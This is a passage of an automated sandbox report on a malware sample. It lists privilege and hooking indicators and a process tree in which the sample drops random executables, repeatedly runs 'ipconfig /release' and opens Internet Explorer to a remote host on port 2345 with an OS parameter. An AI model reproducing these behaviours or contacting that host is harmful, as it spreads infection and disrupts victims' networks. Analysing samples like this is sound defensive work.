| Token: SeDebugPrivilege | N/A | C:\Temp\i_zxspkicamk.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_xrpjhczusm.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_uomgezwroj.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_rljdbwtomg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_wqoigbytql.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_tnlfdyvqoi.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_qnigaysqki.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_qkicausnkf.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_upnhfzxspk.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_smkecwupmh.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe"
C:\Temp\dxvpnifaysqkicav.exe
C:\Temp\dxvpnifaysqkicav.exe run
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://xytets.com:2345/t.asp?os=home
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3468 CREDAT:17410 /prefetch:2
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\kicavpnhfa.exe ups_run
C:\Temp\kicavpnhfa.exe
C:\Temp\kicavpnhfa.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_kicavpnhfa.exe ups_ins
C:\Temp\i_kicavpnhfa.exe
C:\Temp\i_kicavpnhfa.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\kfzxrpkhcz.exe ups_run
C:\Temp\kfzxrpkhcz.exe
C:\Temp\kfzxrpkhcz.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_kfzxrpkhcz.exe ups_ins
C:\Temp\i_kfzxrpkhcz.exe
C:\Temp\i_kfzxrpkhcz.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\zusmkecwup.exe ups_run
C:\Temp\zusmkecwup.exe
C:\Temp\zusmkecwup.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_zusmkecwup.exe ups_ins
C:\Temp\i_zusmkecwup.exe
C:\Temp\i_zusmkecwup.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\zxrpjhczur.exe ups_run
C:\Temp\zxrpjhczur.exe
C:\Temp\zxrpjhczur.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_zxrpjhczur.exe ups_ins
C:\Temp\i_zxrpjhczur.exe
C:\Temp\i_zxrpjhczur.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\trljebwuom.exe ups_run
C:\Temp\trljebwuom.exe
C:\Temp\trljebwuom.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_trljebwuom.exe ups_ins
C:\Temp\i_trljebwuom.exe
C:\Temp\i_trljebwuom.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\ojgbztrljd.exe ups_run
C:\Temp\ojgbztrljd.exe
C:\Temp\ojgbztrljd.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_ojgbztrljd.exe ups_ins
C:\Temp\i_ojgbztrljd.exe
C:\Temp\i_ojgbztrljd.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\oigtqljdbv.exe ups_run
C:\Temp\oigtqljdbv.exe
C:\Temp\oigtqljdbv.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_oigtqljdbv.exe ups_ins
C:\Temp\i_oigtqljdbv.exe
C:\Temp\i_oigtqljdbv.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\fdyvqnigay.exe ups_run
C:\Temp\fdyvqnigay.exe
C:\Temp\fdyvqnigay.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_fdyvqnigay.exe ups_ins
C:\Temp\i_fdyvqnigay.exe
C:\Temp\i_fdyvqnigay.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\axsqkicaus.exe ups_run
C:\Temp\axsqkicaus.exe
C:\Temp\axsqkicaus.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_axsqkicaus.exe ups_ins
C:\Temp\i_axsqkicaus.exe
C:\Temp\i_axsqkicaus.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\usmkfcxvpn.exe ups_run
C:\Temp\usmkfcxvpn.exe
C:\Temp\usmkfcxvpn.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_usmkfcxvpn.exe ups_ins
C:\Temp\i_usmkfcxvpn.exe
C:\Temp\i_usmkfcxvpn.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\zxspkicamk.exe ups_run
C:\Temp\zxspkicamk.exe
C:\Temp\zxspkicamk.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_zxspkicamk.exe ups_ins
C:\Temp\i_zxspkicamk.exe
C:\Temp\i_zxspkicamk.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\xrpjhczusm.exe ups_run
C:\Temp\xrpjhczusm.exe
C:\Temp\xrpjhczusm.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_xrpjhczusm.exe ups_ins
C:\Temp\i_xrpjhczusm.exe
C:\Temp\i_xrpjhczusm.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\uomgezwroj.exe ups_run
C:\Temp\uomgezwroj.exe
C:\Temp\uomgezwroj.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_uomgezwroj.exe ups_ins
C:\Temp\i_uomgezwroj.exe
C:\Temp\i_uomgezwroj.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\rljdbwtomg.exe ups_run
C:\Temp\rljdbwtomg.exe
C:\Temp\rljdbwtomg.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_rljdbwtomg.exe ups_ins
C:\Temp\i_rljdbwtomg.exe
C:\Temp\i_rljdbwtomg.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\wqoigbytql.exe ups_run
C:\Temp\wqoigbytql.exe
C:\Temp\wqoigbytql.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_wqoigbytql.exe ups_ins
C:\Temp\i_wqoigbytql.exe
C:\Temp\i_wqoigbytql.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\tnlfdyvqoi.exe ups_run
C:\Temp\tnlfdyvqoi.exe
C:\Temp\tnlfdyvqoi.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_tnlfdyvqoi.exe ups_ins
C:\Temp\i_tnlfdyvqoi.exe
C:\Temp\i_tnlfdyvqoi.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\qnigaysqki.exe ups_run
C:\Temp\qnigaysqki.exe
C:\Temp\qnigaysqki.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_qnigaysqki.exe ups_ins
C:\Temp\i_qnigaysqki.exe
C:\Temp\i_qnigaysqki.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\qkicausnkf.exe ups_run
C:\Temp\qkicausnkf.exe
C:\Temp\qkicausnkf.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_qkicausnkf.exe ups_ins
C:\Temp\i_qkicausnkf.exe
C:\Temp\i_qkicausnkf.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\upnhfzxspk.exe ups_run
C:\Temp\upnhfzxspk.exe
C:\Temp\upnhfzxspk.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_upnhfzxspk.exe ups_ins
C:\Temp\i_upnhfzxspk.exe
C:\Temp\i_upnhfzxspk.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\smkecwupmh.exe ups_run
C:\Temp\smkecwupmh.exe
C:\Temp\smkecwupmh.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_smkecwupmh.exe ups_ins
C:\Temp\i_smkecwupmh.exe
C:\Temp\i_smkecwupmh.exe ups_ins
Network
Files